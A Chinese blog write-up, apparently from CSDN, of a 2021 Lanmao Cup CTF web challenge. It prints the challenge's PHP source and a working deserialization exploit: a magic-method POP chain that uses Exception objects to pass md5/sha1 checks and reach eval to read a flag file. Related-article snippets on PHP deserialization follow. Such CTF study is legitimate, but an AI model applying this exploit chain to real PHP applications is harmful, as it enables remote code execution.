[2021 蓝帽杯]杰克与肉丝

最新推荐文章于 2025-05-20 17:01:17 发布
最新推荐文章于 2025-05-20 17:01:17 发布
阅读量1k 收藏 3
点赞数 1
文章标签: web安全 php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_64201116/article/details/127184136
版权
本文介绍了一种利用PHP原生类Exception实现MD5与SHA1哈希值绕过的特殊技巧,并通过具体示例展示了如何在特定条件下使不同变量的哈希值相同,以此达到绕过安全检查的目的。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前置知识:

原生类Exception绕过md5,sha1

先看看原生类Exception里面有什么:

<?php
var_dump($a=new Exception());

这里有个非常有意思的绕过md5和sh1的方法。

来看两个例子:

<?php

class Test{

public $var1;

public $var2;

function __destruct(){

if(md5($this->var1)===md5($this->var2))

{

echo "yes";

}

else{

echo "no";

}

}

}

$str="highlight_file('/flag');?>";

$var1=new Exception($str,1);$var2=new Exception($str,2);

var_dump(md5($var1));

var_dump(md5($var2));

$R = new Test();

$R->var1=$var1;

$R->var2=$var2;

//输出

<?php

class Test{

public $var1;

public $var2;

function __destruct(){

if(md5($this->var1)===md5($this->var2))

{

echo "yes";

}

else{

echo "no";

}

}

}

$str="highlight_file('/flag');?>";

$var1=new Exception($str,1);

$var2=new Exception($str,2);

var_dump(md5($var1));

var_dump(md5($var2));

$R = new Test();

$R->var1=$var1;

$R->var2=$var2;

输出:

这两段代码唯一的 区别就是:

$var1和$var2是否同行

如果同行的话,则md5值不相等。SHA1则同理。

解题

题目直接给出源码:

<?php
highlight_file(__file__);


class Jack
{
    private $action;


    function __set($a, $b)
    {
        $b->$a();

    }

}

class Love {

    public $var;
    function __call($a,$b)
    {
        $rose = $this->var;
        call_user_func($rose);
    }

    private function action(){
        echo "jack love rose";
    }

}
class Titanic{
    public $people;
    public $ship;
    function __destruct(){

        $this->people->action=$this->ship;
    }
}
class Rose{
    public $var1;
    public $var2;
    function __invoke(){
        if( ($this->var1 != $this->var2) && (md5($this->var1) === md5($this->var2)) && (sha1($this->var1)=== sha1($this->var2)) ){
            eval($this->var1);
        }
    }
}

if(isset($_GET['love'])){
    $sail=$_GET['love'];
    unserialize($sail);
}
?>

链子的过程比较简单 ,难点在绕过md5那里,以前没有接触过。

还有要注意的就是从后往前赋值。其他没什么了(我下面标出了序号)

直接给出payload:

<?php


class Jack // 2
{
    private $action;


    function __set($a, $b)  // 给不存在赋值
    {

    }

}

class Love { // 3

    public $var;
    function __call($a,$b)  // 调用不存在方法或者不可访问方法
    {
		echo "Love";
        $rose = $this->var;
        call_user_func($rose);  // 可以触发__invoke
    }

}
class Titanic{ // 1
    public $people;
    public $ship;
    function __destruct(){ // 销毁变量
        $this->people->action=$this->ship;
    }
}
class Rose{ // 4
    public $var1;
    public $var2;
    function __invoke(){  // 对象调用为函数
		var_dump($this->var1);
		var_dump($this->var2);
        if( ($this->var1 != $this->var2) && (md5($this->var1) === md5($this->var2)) && (sha1($this->var1)=== sha1($this->var2)) ){
			echo "yes";
			eval($this->var1);
        }
    }
}

$a=new Titanic();
$b=new Jack();
$c=new Love();
$d=new Rose();
$str="highlight_file('/flag');?>";  //需要执行的读取flag文件的命令
$var1=new Exception($str,1);$var2=new Exception($str,2);
$d->var1=$var1;
$d->var2=$var2;
$c->var=$d;
$a->people=$b;
$a->ship=$c;
echo urlencode(serialize($a));
?>

我没做出来的原因是没有从后往前赋值,要先对序号后面的值进行赋值,再引用前面的类。否则会返回赋值为空的报错。

生成的payload直接打就可以了:

清风--
关注
PHP反序列化题目记录
BaiScorpio的博客
06-20 971
最近跑去看了下PHP反序列化,发现比起java容易理解多了,主要是一些魔法函数相关反序列化、字符逃逸的反序列化、session反序列化、POP链反序列化和PHAR反序列化,以下将记录学习过程中的一些例题学习的过程。...
ctf+php反序列化,CTF中的PHP反序列化漏洞简单分析
weixin_39965881的博客
04-02 1923
本帖最后由 icq_8bf67fe65 于 2018-9-2 21:20 编辑本文原创作者:Versi0n,本文属i春秋原创奖励计划,未经许可禁止转载!一、前言在ctf比赛中,经常会遇到php反序列化漏洞的题,今天就来简单分析下该漏洞的正确食用姿势~二、正文1.基础知识PHP序列化:php为了方便进行数据的传输,允许把复杂的数据结构,压缩到一个字符串中,使用serialize()函数。PHP反序列...
web----杰克肉丝
qq_51233573的博客
01-24 1082
访问靶机环境,得到一段php代码。 对这段php代码进行审计 <?php highlight_file(__FILE__); class Jack { private $action; //定义了一个私有的属性 只能类内部访问 function __set($a,$b) //魔术函数 当向一个不存在的属性或者私有属性写入数据的时候 会触发这个函数 { $b->$a(); } } class Love { public $var ...
WP篇 杰克肉丝复现
这周末在做梦的博客
06-09 1022
半决赛-杰克肉丝一,复现1复现的文件2EXP3复现的环境4效果图(文件结构)二,原理 一,复现 大家在复现的时候要注意php版本,大致情况是php5版本在反序列Excpetion类的时候会出现乱码,所以需要使用php7版本复现。 (上面的概述只经过了代码调式验证,属于个人推断)。 1复现的文件 index.php <?php highlight_file(__file__); class Jack { private $action; function
第五届半决赛部分WP
qq_46230755的博客
06-06 1487
文章目录RE:ser_leakWEB:杰克肉丝PWN:cover RE:ser_leak 题目是原题: x1-x5: def func2(x): if x == 0: return 0 return (x % 2) + func2(x // 2) def func3(x): return x % 2 def func1(N, L, R): if L == R: return L mid = (L + R + 1) // 2 if N < mid * mid: retur
<?php class first{ public $a; public function __destruct() { die($this->a); ...
weixin_35753291的博客
02-16 172
这段代码是一个 PHP 的反序列化漏洞示例。具体来说,代码中定义了两个类 first 和 Last。在 first 类中,有一个公共属性 $a 和一个 __destruct() 方法,当实例化 first 类的对象被销毁时,会打印出属性 $a 的值。在 Last 类中,有一个公共属性 $b 和一个 __toString() 方法,当实例化 Last 类的对象被转换为字符串时,会执行 $b 属性的值...
【MISC】domainhacker2(第六届”“全国大学生网络安全技能大赛)
07-11
【MISC】domainhacker2 是一场比赛项目,源自第六届""全国大学生网络安全技能大赛。这个比赛旨在提升大学生在网络安全领域的实践能力和理论知识,促进网络安全技术的学习交流。从提供的文件名来看,我们可以...
【电子取证】网站取证(第六届”“全国大学生网络安全技能大赛)
07-12
在第六届“”全国大学生网络安全技能大赛中,参赛者可能需要掌握这项技术来解决实际问题。电子取证,也被称为数字取证,是指在法律允许的范围内,对电子设备中的数据进行收集、分析、验证,以获取法律纠纷或...
第六届”“全国大学生网络安全技能大赛(半决赛)其他赛题
08-05
作为一项知名的赛事,每年都会吸引众多学子参赛,通过各种形式的赛题来检验他们的理论知识实际操作水平。 【描述】:描述中的信息简洁明了,再次确认了这是大赛的半决赛阶段,意味着参赛者已经经过了...
【电子取证】程序分析(第六届”“全国大学生网络安全技能大赛)
07-12
第六届”“全国大学生网络安全技能大赛
【电子取证】计算机取证(第六届”“全国大学生网络安全技能大赛)
07-13
第六届""全国大学生网络安全技能大赛正是这样一个平台,旨在培养和挖掘大学生在网络安全,尤其是电子取证方面的能力潜力。 电子取证,或称数字取证,是指在法律框架下,对电子设备中的数据进行收集、分析、...
one_Pointer_php writeup
05-10
one_Pointer_php writeup
buuctf 刷题2(md5(true)参数漏洞&php字符串解析特性&php&dirsearch&php反序列化)
weixin_63231007的博客
05-02 2439
[BJDCTF2020]Easy MD5 1 burp抓包,发现传入的参数的语句为: Hint: select * from 'admin' where password=md5($pass,true) md5函数介绍为: md5( string , raw ) string : 规定需要计算的字符串 raw : 规定十六进制或二进制输出格式。 true:16字符二进制格式 false(默认): 32字符十六进制数 md5 true参数漏洞有 ff...
CTFshow刷题日记-WEB-反序列化篇(上,254-263)
Love&Share
09-22 3288
非反序列化 web254-简单审计 这个题是搞笑的么???? 按着源码顺序走一遍 ...... $username=$_GET['username']; $password=$_GET['password']; if(isset($username) && isset($password)){ $user = new ctfShowUser(); if($user->login($username,$password)){ if($user->c
CTF平台题库writeup(一)--南邮CTF-WEB(部分)
热门推荐
渗透、攻防、CTF、编程
06-25 1万+
WEB题 1.签到题 题目:key在哪里? writeup:查看源代码即可获得flag! 2.md5 collision 题目: <?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $md51 == $md52) { echo "nctf{*****************}"; } else {
PHP 函数漏洞总结
wuyouxiaoli的博客
02-17 347
1.MD5 compare漏洞 PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。 常见的payload有 0x01md5(str) QNKCDZO 240610708 s878926199a s155964671a s214587387a s214587387asha1(st...
网络安全之网络攻击spring临时文件利用
最新发布
anquan2233的博客
05-20 1237
本文探索了JDBC MySQL驱动在利用临时文件进行不出网环境下的反序列化利用,改变了攻击MySQL驱动需要外连FakeServer的传统攻击手法,这种利用方式在realworld中具有更加隐蔽的特性。而文章后半段提到的临时文件部分可以无条件将一个纯净的文件上传到目标服务器并确定位置,对于需要本地文件的攻击(如:ClassPathXmlApplicationContext加载本地XML、加载本地类文件场景、加载本地插件场景等)也是个不错的利用思路。
WEB安全--Java安全--shiro550反序列化漏洞
m0_74800552的博客
05-16 556
shiro550反序列化
网络安全-等级保护(等保) 2-7-2 GB/T 25058—2019 第6章 总体安全规划
项目管理到售前,一路成长的伙伴!
05-19 1111
等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值